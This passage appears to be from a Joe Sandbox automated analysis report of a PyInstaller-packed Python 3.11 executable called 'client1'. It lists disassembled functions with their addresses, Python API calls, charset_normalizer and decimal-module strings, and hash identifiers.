                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: __init__$charset_normalizer.md.SuspiciousDuplicateAccentPlugin$interpreted classes cannot inherit from compiled
                                                    • API String ID: 1450464846-1506521901
                                                    • Opcode ID: 4f9607bb26152d36a62855f69e1e92066554209e4990823762cc37e355d07849
                                                    • Instruction ID: 30b11fc59b1c4b6b362b453da15576213fc9ceaa152e58077c9b61502eb3a53a
                                                    • Opcode Fuzzy Hash: 4f9607bb26152d36a62855f69e1e92066554209e4990823762cc37e355d07849
                                                    • Instruction Fuzzy Hash: A53129B1A0AB4281EB128F2AF88036963B0FB48B88F54853ADE6D47779DF7DD555C340
                                                    Function 00007FFBAA716FDC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: FormatFromUnicode_
                                                    • String ID: False$True${<class '%s'>:%s, <class '%s'>:%s, <class '%s'>:%s, <class '%s'>:%s, <class '%s'>:%s, <class '%s'>:%s, <class '%s'>:%s, <class '%s'>:%s, <class '%s'>:%s}
                                                    • API String ID: 3889672380-2743431446
                                                    • Opcode ID: f995eacbdabc04b11ee8721ccd51a25ac2d833d40258d5847d7302674445f47e
                                                    • Instruction ID: edb17be57e35cb003f940e5b7c244a19c71dd714be687af9a3e24194c8e4fd89
                                                    • Opcode Fuzzy Hash: f995eacbdabc04b11ee8721ccd51a25ac2d833d40258d5847d7302674445f47e
                                                    • Instruction Fuzzy Hash: 6A318276A06F45C9EB518F69E88039E77B8F748B98F500126DE8C57B28EF38D155CB10
                                                    Function 00007FFBAA708014 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Arg_DeallocErr_KeywordsParseStringTuple
                                                    • String ID: optional argument must be a context
                                                    • API String ID: 2394110584-3732962867
                                                    • Opcode ID: 46243e6063ea57f9d7b5eaf9eaf3c720bc946233cb08bfc47c4f57a2e7e05993
                                                    • Instruction ID: 4847db217590924527bd5b531148ff2cb35b5de60ee0270390a91ae2763ffacf
                                                    • Opcode Fuzzy Hash: 46243e6063ea57f9d7b5eaf9eaf3c720bc946233cb08bfc47c4f57a2e7e05993
                                                    • Instruction Fuzzy Hash: DF2125A1A0AA07D0EA028F35E8801BB77ACAF44B90F5044B2CD4E56BB4DE6DE147C325
                                                    Function 00007FFBAB494FD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocErr_String
                                                    • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_last_printable_char' cannot be deleted$str or None
                                                    • API String ID: 1259552197-2331204894
                                                    • Opcode ID: 32e75a776e48ac4c2c5fe5fe0fb0a9e3155ffe328c8c67ac2beb131072333536
                                                    • Instruction ID: 7449ef21b9bb4f44b0aa8623d36039b659a5faf730ddef68fda87215b6812d92
                                                    • Opcode Fuzzy Hash: 32e75a776e48ac4c2c5fe5fe0fb0a9e3155ffe328c8c67ac2beb131072333536
                                                    • Instruction Fuzzy Hash: EE1191B2B1AA4682EE46CF3AE59023C6360FB44B94F58C135DE2D077B5DE2CE4918340
                                                    Function 00007FFBAB496020 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocErr_String
                                                    • String ID: 'SuspiciousDuplicateAccentPlugin' object attribute '_last_latin_character' cannot be deleted$str or None
                                                    • API String ID: 1259552197-4111674009
                                                    • Opcode ID: 8e765b0d61acfcd8c10934ee4906ef0f2b2d39b6f7c7e18e8a84478dcf422f92
                                                    • Instruction ID: 979b1245878dff33a123b0e8c9140c2efc348ad4518b65cc98064d5f1fd274fb
                                                    • Opcode Fuzzy Hash: 8e765b0d61acfcd8c10934ee4906ef0f2b2d39b6f7c7e18e8a84478dcf422f92
                                                    • Instruction Fuzzy Hash: 23118FB2B1AA0681FF52CB2AE5D023C6360EB88B94F488135DE3D077A4DE3CD4908300
                                                    Function 00007FFBAA70FC20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • Context(prec=%zd, rounding=%s, Emin=%zd, Emax=%zd, capitals=%d, clamp=%d, flags=%s, traps=%s), xrefs: 00007FFBAA70FC98
                                                    • internal error in context_repr, xrefs: 00007FFBAA716EB7
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_FormatFromStringUnicode_
                                                    • String ID: Context(prec=%zd, rounding=%s, Emin=%zd, Emax=%zd, capitals=%d, clamp=%d, flags=%s, traps=%s)$internal error in context_repr
                                                    • API String ID: 1884982852-1630598095
                                                    • Opcode ID: c032508e1638e32cb860f0bf575b5598efde2c1b5a4c2d8c493699452706a803
                                                    • Instruction ID: d5ea252273756559ae58c9b4e30c63f593e9fe0a25640134b99f23b97c7322a9
                                                    • Opcode Fuzzy Hash: c032508e1638e32cb860f0bf575b5598efde2c1b5a4c2d8c493699452706a803
                                                    • Instruction Fuzzy Hash: 2B21F9B2609A42D6DB22CF31E4906AB77A8FB88B54F100572DE4D47764DE3DE04ACB60
                                                    Function 00007FFBAB4A0CB6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _Py_Dealloc.PYTHON311 ref: 00007FFBAB4A0CB9
                                                      • Part of subcall function 00007FFBAB494540: PyObject_GetAttr.PYTHON311 ref: 00007FFBAB494566
                                                      • Part of subcall function 00007FFBAB494540: PyUnicode_FromFormat.PYTHON311 ref: 00007FFBAB494585
                                                      • Part of subcall function 00007FFBAB494540: PyObject_GetItem.PYTHON311 ref: 00007FFBAB494599
                                                      • Part of subcall function 00007FFBAB494540: _Py_Dealloc.PYTHON311 ref: 00007FFBAB4945AB
                                                      • Part of subcall function 00007FFBAB494540: PyErr_Clear.PYTHON311 ref: 00007FFBAB4945B6
                                                      • Part of subcall function 00007FFBAB494540: PyModule_GetFilenameObject.PYTHON311 ref: 00007FFBAB4945BF
                                                      • Part of subcall function 00007FFBAB494540: PyUnicode_FromFormat.PYTHON311 ref: 00007FFBAB4945D8
                                                      • Part of subcall function 00007FFBAB494540: PyErr_SetImportError.PYTHON311 ref: 00007FFBAB4945EA
                                                      • Part of subcall function 00007FFBAB494540: _Py_Dealloc.PYTHON311 ref: 00007FFBAB4945F9
                                                      • Part of subcall function 00007FFBAB494540: _Py_Dealloc.PYTHON311 ref: 00007FFBAB494608
                                                    • PyDict_SetItem.PYTHON311 ref: 00007FFBAB4A0D06
                                                    • _Py_Dealloc.PYTHON311 ref: 00007FFBAB4A0D1F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Err_FormatFromItemObject_Unicode_$AttrClearDict_ErrorFilenameImportModule_Object
                                                    • String ID: <module>
                                                    • API String ID: 3933568714-217463007
                                                    • Opcode ID: 7b13a31264b79e89851a6d61d6372347fd4847a0b1f1e490f03075708453d135
                                                    • Instruction ID: 7dcf948ea690ccf52950525a6d122830edb6aafe18155625304e36526d718d67
                                                    • Opcode Fuzzy Hash: 7b13a31264b79e89851a6d61d6372347fd4847a0b1f1e490f03075708453d135
                                                    • Instruction Fuzzy Hash: 081127E6A0BA0644FA179F77F8902782660AF14BD0F04D03ECD2E063B0EE3CF0918240
                                                    Function 00007FFBAB49AEF0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocErr_FormatMethodObject_Vectorcall
                                                    • String ID: bool$eligible
                                                    • API String ID: 2503426208-3320767611
                                                    • Opcode ID: d8798120b881b628d4f32557d3a83a5594d57e1307ce288bef6a3fc46a691348
                                                    • Instruction ID: 8941c3c7566621f5cbca1b6563f660b5e9825ea87e596a30cfcc5fa3c811fe17
                                                    • Opcode Fuzzy Hash: d8798120b881b628d4f32557d3a83a5594d57e1307ce288bef6a3fc46a691348
                                                    • Instruction Fuzzy Hash: 7A1161E1A0AA4281EB628B36F4816BD27A0FF88784F48D036ED6D07774DE2CE490C700
                                                    Function 00007FFBAB498B30 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocErr_FormatMethodObject_Vectorcall
                                                    • String ID: bool$eligible
                                                    • API String ID: 2503426208-3320767611
                                                    • Opcode ID: 5c7763d0d40455b74a9c88c00daeaa33e6d0a0f9953aad7b51454f9e04c63c1b
                                                    • Instruction ID: 4a17261bb7358ef9486c9ee8afe6f4c3c803dd64f7f2c00c6400b272df8415be
                                                    • Opcode Fuzzy Hash: 5c7763d0d40455b74a9c88c00daeaa33e6d0a0f9953aad7b51454f9e04c63c1b
                                                    • Instruction Fuzzy Hash: 90115EE1A1AA4281EB628B3AF8816BD27A0EF847C4F48D035ED6D07675DE2CE490C700
                                                    Function 00007FFBAA731EF0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PyErr_SetString.PYTHON311(?,?,?,?,?,00007FFBAA731EDC), ref: 00007FFBAA733B6F
                                                      • Part of subcall function 00007FFBAA731FD0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFBAA732008
                                                      • Part of subcall function 00007FFBAA731FD0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFBAA732026
                                                    • PyErr_Format.PYTHON311 ref: 00007FFBAA731F53
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_strncmp$FormatString
                                                    • String ID: name too long$undefined character name '%s'
                                                    • API String ID: 3882229318-4056717002
                                                    • Opcode ID: 8b8c9c862c8556266a26c0415d30d38fd4fd6db163ae40366dde064f1277ed55
                                                    • Instruction ID: 3600c85a15d85919754a8a753416545ef2e6ad9350c1eda2132790d7f09719c1
                                                    • Opcode Fuzzy Hash: 8b8c9c862c8556266a26c0415d30d38fd4fd6db163ae40366dde064f1277ed55
                                                    • Instruction Fuzzy Hash: 5A1121F6B1A947C6EB01AF24D4882BA6369FB88748F8144B5CE0D47264DF6DD14BC730
                                                    Function 00007FF79F623BA0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,00007FF79F623699), ref: 00007FF79F623BD1
                                                      • Part of subcall function 00007FF79F622620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79F627744,?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F622654
                                                      • Part of subcall function 00007FF79F622620: MessageBoxW.USER32 ref: 00007FF79F62272C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastMessageModuleName
                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                    • API String ID: 2581892565-1977442011
                                                    • Opcode ID: fe87d08da65b513e87772ab3e16eb14927cda1b8744753a26f3e7d7b1799e4b8
                                                    • Instruction ID: 64e40b5f08e71e9dbc1b1938ebb9efc0a48c75c8d0abd793f5d21a7513db45bc
                                                    • Opcode Fuzzy Hash: fe87d08da65b513e87772ab3e16eb14927cda1b8744753a26f3e7d7b1799e4b8
                                                    • Instruction Fuzzy Hash: 0701BC21B1C3C290FA30BB30EC523F9925BBF08394FC00535E86EC6682EE5CE1459621
                                                    Function 00007FFBAA709BA0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: CompareStringUnicode_With
                                                    • String ID: flags$traps
                                                    • API String ID: 3588640018-2868145861
                                                    • Opcode ID: a18f8b451ce67ac5fa1682d33940de880b947d6654e043ae6765edebbda2d9f8
                                                    • Instruction ID: b646c96dcac64e4ed37c30c79aa62ee220309195fa4eb6f84c00dbe682e96493
                                                    • Opcode Fuzzy Hash: a18f8b451ce67ac5fa1682d33940de880b947d6654e043ae6765edebbda2d9f8
                                                    • Instruction Fuzzy Hash: A00162A2B09A42D1EB468F26F98017A63B4FB88BD0F485072DE4D07764EF2DD4E2C714
                                                    Function 00007FFBAB4A0A50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocImportImport_List_
                                                    • String ID: <module>
                                                    • API String ID: 2210235416-217463007
                                                    • Opcode ID: 1bad30b6080a49f88ab072cbc376c9f9ad1d1c91adffd84587c2140ecda7d86d
                                                    • Instruction ID: 97d7e6424030d1b46c82208aa5636e07c65da72a2074e35878e33a4878d86c4b
                                                    • Opcode Fuzzy Hash: 1bad30b6080a49f88ab072cbc376c9f9ad1d1c91adffd84587c2140ecda7d86d
                                                    • Instruction Fuzzy Hash: 6B01E8E6E0BB1280FA139B67E85437862A0AF58B94F04C43DDD2D073B0EE3CB4959300
                                                    Function 00007FFBAA709D7C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_$Long_OccurredSsize_tString
                                                    • String ID: valid values for clamp are 0 or 1
                                                    • API String ID: 2426478915-2125878968
                                                    • Opcode ID: 850e601e1e4291add9c5e474e4a395b4e57a6238550951774b5c9da6e89585e5
                                                    • Instruction ID: 309522ff42a520eb940767dc4470ef606d26d3eea80572bdd5e8662f3de2b980
                                                    • Opcode Fuzzy Hash: 850e601e1e4291add9c5e474e4a395b4e57a6238550951774b5c9da6e89585e5
                                                    • Instruction Fuzzy Hash: D6F081B1B0A602D2EA158F35F98017A7794AF44BB4F244372DD3D463F0DE2EE8938211
                                                    Function 00007FFBAB4A1EE8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocDict_ItemPackTuple_
                                                    • String ID: <module>
                                                    • API String ID: 4228545439-217463007
                                                    • Opcode ID: e6b9ac5ea6bc87588d057a7324b182d3951b47da1a8051baaf59f576c03fa587
                                                    • Instruction ID: c0983ee0896fa2880f0feb55eeea42d14a942a432509c87aa04ef6a02490691c
                                                    • Opcode Fuzzy Hash: e6b9ac5ea6bc87588d057a7324b182d3951b47da1a8051baaf59f576c03fa587
                                                    • Instruction Fuzzy Hash: 8AF03AE6E0B90381FA139B76E80477952616F41BA6F44C13DDD3D076B0EE3DB486A300
                                                    Function 00007FFBAB4A1BDD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocDict_ItemPackTuple_
                                                    • String ID: <module>
                                                    • API String ID: 4228545439-217463007
                                                    • Opcode ID: 1084cce7428efea4fcd280cfcf0effde51fc0c129bbc933e10c8f1909bcf843e
                                                    • Instruction ID: a1c6c4e7856313c9040da22eb03273e8972599a944483e281667fd43ba63b4f3
                                                    • Opcode Fuzzy Hash: 1084cce7428efea4fcd280cfcf0effde51fc0c129bbc933e10c8f1909bcf843e
                                                    • Instruction Fuzzy Hash: 98F017E6A0BA1281FA136B76E84037862616F41BA6F04C53DDD3D072B0EE3DA4856300
                                                    Function 00007FFBAB4A18BA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
